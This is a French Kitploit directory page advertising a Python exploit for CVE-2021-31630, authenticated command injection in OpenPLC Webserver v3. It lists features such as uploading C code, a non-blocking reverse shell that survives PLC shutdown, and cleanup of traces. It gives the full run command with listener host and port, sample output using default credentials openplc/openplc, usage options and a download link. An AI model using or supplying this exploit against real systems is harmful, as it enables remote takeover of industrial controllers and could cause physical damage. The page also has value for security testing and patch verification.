Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2021-31630 — Script Python pour exploiter l'injection de commandes dans Open PLC Webserver v3 | Kitploit
Outils/GitHubGitHub/thewhiteh4t/cve-2021-31630
Analyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubthewhiteh4t/cve-2021-31630

cve-2021-31630

Script Python pour exploiter l'injection de commandes dans Open PLC Webserver v3

Voir le dépôt
214il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

cve-2021-31630

OpenPLC WebServer v3 – RCE authentifié

Ce script PoC est basé sur l'exploit fourni par Fellipe Oliveira.

Fonctionnalités :

  • Téléverse directement du code C vers /hardware au lieu d'un fichier st
  • Restaure le programme par défaut avant de téléverser le reverse shell
  • Reverse shell en C amélioré, non bloquant pour que le serveur web ne se bloque pas ;)
  • Lance un shell en arrière-plan, fonctionne même après l'arrêt du PLC jusqu'à la sortie
  • Nettoyage
root@kitploit:~
$ python cve_2021_31630.py -lh 10.10.16.68 -lp 4444 http://10.10.11.7:8080

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------

[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]

[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 20 secs
[>] LHOST    : 10.10.16.68
[>] LPORT    : 4444

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!

Dépendances

root@kitploit:~
pip3 install requests

Utilisation

root@kitploit:~
usage: cve_2021_31630.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         URL cible avec http(s)://

options:
  -h, --help  afficher ce message d'aide et quitter
  -u U        Nom d'utilisateur
  -p P        Mot de passe
  -t T        Délai d'attente de la requête, augmenter si le serveur est lent
  -lh LH      LHOST
  -lp LP      LPORT
Télécharger l’outil